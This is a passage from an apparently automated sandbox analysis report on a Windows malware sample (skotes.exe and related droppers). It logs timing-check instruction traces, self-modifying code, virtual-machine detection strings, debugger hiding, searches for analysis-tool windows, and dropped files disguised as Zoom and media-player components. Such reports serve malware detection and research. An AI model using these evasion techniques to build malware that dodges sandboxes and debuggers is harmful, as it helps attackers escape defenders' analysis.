Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4D80AFA second address: 4D80AFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4D80AFE second address: 4D80B4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jmp 00007FC4CCEF6AE6h 0x0000000e mov dword ptr [esp], ebx 0x00000011 jmp 00007FC4CCEF6AE0h 0x00000016 xchg eax, ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FC4CCEF6AE7h 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4D80B4A second address: 4D80B50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4D80B50 second address: 4D80B54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4D80B54 second address: 4D80B80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov edx, esi 0x0000000c mov di, ax 0x0000000f popad 0x00000010 xchg eax, ebx 0x00000011 jmp 00007FC4CC910592h 0x00000016 push dword ptr [ebp+14h] 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4D80B80 second address: 4D80B84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4D80B84 second address: 4D80B88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4D80B88 second address: 4D80B8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4D80BEA second address: 4D80BEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4D80BEE second address: 4D80BF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4D80BF4 second address: 4D80C32 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4CC910592h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FC4CC91058Eh 0x00000011 sub ax, 1FB8h 0x00000016 jmp 00007FC4CC91058Bh 0x0000001b popfd 0x0000001c push eax 0x0000001d push edx 0x0000001e mov cx, 0185h 0x00000022 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4D90CEE second address: 4D90CF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4D90CF3 second address: 4D90CF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4D90CF9 second address: 4D90D74 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4CCEF6AE4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FC4CCEF6ADEh 0x00000014 xor ch, FFFFFFA8h 0x00000017 jmp 00007FC4CCEF6ADBh 0x0000001c popfd 0x0000001d pushfd 0x0000001e jmp 00007FC4CCEF6AE8h 0x00000023 jmp 00007FC4CCEF6AE5h 0x00000028 popfd 0x00000029 popad 0x0000002a pop ebp 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007FC4CCEF6ADDh 0x00000032 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Special instruction interceptor: First address: BBEC6C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Special instruction interceptor: First address: BBECBC instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Special instruction interceptor: First address: D5FB13 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Special instruction interceptor: First address: D708E0 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Special instruction interceptor: First address: DEFB5A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 9FEC6C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 9FECBC instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: B9FB13 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: BB08E0 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: C2FB5A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Memory allocated: 2A00000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Memory allocated: 2C10000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Memory allocated: 4C10000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Code function: 3_2_04E00342 rdtsc 3_2_04E00342
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3191
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5591
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Cross-platform Player 3.99\libGLESv2.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\ZoomUs\EOSSDK-Win64-Shipping.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1053670001\8fb472f3d3.exe
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Cross-platform Player 3.99\is-U772O.tmp
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Cross-platform Player 3.99\Qt5PrintSupport.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[1].exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1053669001\b191a8c87b.exe
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Cross-platform Player 3.99\is-7SCO6.tmp
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Cross-platform Player 3.99\msvcr100.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Cross-platform Player 3.99\uninstall\is-8C04K.tmp
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Cross-platform Player 3.99\msvcp100.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-5IJJ6.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-9JA86.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Cross-platform Player 3.99\is-NNPOE.tmp
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Cross-platform Player 3.99\is-O3JN0.tmp
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Cross-platform Player 3.99\uninstall\unins000.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Cross-platform Player 3.99\is-MJUM6.tmp
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[2].exe
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-5IJJ6.tmp\_isetup\_shfoldr.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\random[2].exe
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Cross-platform Player 3.99\icuuc51.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-5IJJ6.tmp\_isetup\_iscrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Cross-platform Player 3.99\Qt5Concurrent.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\random[1].exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1053671001\0269e2f5f3.exe
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Cross-platform Player 3.99\icuin51.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Cross-platform Player 3.99\is-JO5R4.tmp
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Cross-platform Player 3.99\is-9J3SL.tmp
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1053672001\c9cd3322a0.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Cross-platform Player 3.99\is-R7PP0.tmp
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1053662101\1e9cc73e62.exe
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Cross-platform Player 3.99\libEGL.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\ZoomUs\Nda0ProtocolZoom.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\ZoomUs\is-RCAI0.tmp
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Cross-platform Player 3.99\is-LGLQ2.tmp
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1053579001\4db43293bc.exe
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\ZoomUs\is-LV70G.tmp
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe API coverage: 0.0 %
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com API coverage: 4.2 %
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6684 Thread sleep time: -12912720851596678s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2144 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 380 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7700 Thread sleep count: 66 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7700 Thread sleep time: -132066s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7720 Thread sleep count: 79 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7720 Thread sleep time: -158079s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7684 Thread sleep count: 180 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7684 Thread sleep time: -5400000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7704 Thread sleep count: 89 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7704 Thread sleep time: -178089s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7696 Thread sleep count: 35 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7696 Thread sleep time: -70035s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7724 Thread sleep count: 85 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7724 Thread sleep time: -170085s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7684 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com TID: 1512 Thread sleep count: 67 > 30
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com TID: 5616 Thread sleep count: 69 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Cross-platform Player 3.99\crossplatformplayer.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Code function: 11_2_00406301 FindFirstFileW,FindClose, 11_2_00406301
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Code function: 11_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 11_2_00406CC7
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_0098E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 28_2_0098E472
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_0098DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 28_2_0098DC54
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_0099A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 28_2_0099A087
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_0099A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 28_2_0099A1E2
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_0099A570 FindFirstFileW,Sleep,FindNextFileW,FindClose, 28_2_0099A570
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_009966DC FindFirstFileW,FindNextFileW,FindClose, 28_2_009966DC
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_0095C622 FindFirstFileExW, 28_2_0095C622
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_009973D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 28_2_009973D4
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_00997333 FindFirstFileW,FindClose, 28_2_00997333
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_0098D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 28_2_0098D921
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_00925FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 28_2_00925FC8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\764661\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\764661
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\
Source: skotes.exe, skotes.exe, 0000000A.00000002.3557951700.0000000000B80000.00000040.00000001.01000000.0000000D.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: chrome.exe, 0000002E.00000002.3235784674.00002AD800B28000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware
Source: powershell.exe, 00000001.00000002.2181823407.00000000035F1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllh,
Source: chrome.exe, 0000002E.00000003.3160795120.00002AD800CAC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware Virtual USB Mouse
Source: jrgXmS0.exe, 00000026.00000003.3018415125.00000000006F6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&0
Source: Macromedia.com, 00000017.00000003.3320167416.00000000041CB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware
Source: powershell.exe, 00000001.00000002.2196176590.0000000007A80000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}E
Source: skotes.exe, 0000000A.00000002.3535140516.00000000008BA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWugWP
Source: chrome.exe, 0000002E.00000002.3235461744.00002AD800AA8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: USB device added: path=\\?\usb#vid_0e0f&pid_0003#5&2dda038&0&5#{a5dcbf10-6530-11d2-901f-00c04fb951ed} vendor=3599 "VMware", product=3 "VMware Virtual USB Mouse", serial="", driver="usbccgp", guid=45f5dbc9-8afa-4616-9812-fa95d639b8fb*
Source: chrome.exe, 0000002E.00000002.3235461744.00002AD800AA8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: #ce added: path=\\?\usb#vid_0e0f&pid_0003#5&2dda038&0&5#{a5dcbf10-6530-11d2-901f-00c04fb951ed} vendor=3599 "VMware", product=3 "VMware Virtual USB Mouse", serial="", driver="usbccgp", guid=45f5dbc9-8afa-4616-9812-fa95d639b8fb*
Source: skotes.exe, 0000000A.00000002.3535140516.0000000000886000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000A.00000002.3535140516.00000000008BA000.00000004.00000020.00020000.00000000.sdmp, ugdKEDU.exe, 00000022.00000002.3517161138.0000000000B4D000.00000004.00000020.00020000.00000000.sdmp, ugdKEDU.exe, 00000022.00000002.3517161138.0000000000AF8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE, 00000003.00000002.2239126632.0000000000D40000.00000040.00000001.01000000.0000000A.sdmp, skotes.exe, 00000004.00000002.2266265318.0000000000B80000.00000040.00000001.01000000.0000000D.sdmp, skotes.exe, 00000005.00000002.2273526778.0000000000B80000.00000040.00000001.01000000.0000000D.sdmp, skotes.exe, 0000000A.00000002.3557951700.0000000000B80000.00000040.00000001.01000000.0000000D.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: chrome.exe, 0000002E.00000002.3235461744.00002AD800AA8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ce added: path=\\?\usb#vid_0e0f&pid_0003#5&2dda038&0&5#{a5dcbf10-6530-11d2-901f-00c04fb951ed} vendor=3599 "VMware", product=3 "VMware Virtual USB Mouse", serial="", driver="usbccgp", guid=45f5dbc9-8afa-4616-9812-fa95d639b8fb
Source: AchillesGuard.com, 0000001C.00000002.3560892474.00000000013AB000.00000004.00000020.00020000.00000000.sdmp, driver3.exe, 00000020.00000002.3222957219.0000020E7B37A000.00000004.00000020.00020000.00000000.sdmp, driver3.exe, 00000020.00000003.2975497090.0000020E7B38F000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3224443779.0000019A1E5B9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: chrome.exe, 0000002E.00000002.3235461744.00002AD800AA8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: USB device added: path=\\?\usb#vid_0e0f&pid_0003#5&2dda038&0&5#{a5dcbf10-6530-11d2-901f-00c04fb951ed} vendor=3599 "VMware", product=3 "VMware Virtual USB Mouse", serial="", driver="usbccgp", guid=45f5dbc9-8afa-4616-9812-fa95d639b8fb
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE System information queried: ModuleInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Code function: 3_2_04E00585 Start: 04E007FB End: 04E00598 3_2_04E00585
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: ollydbg
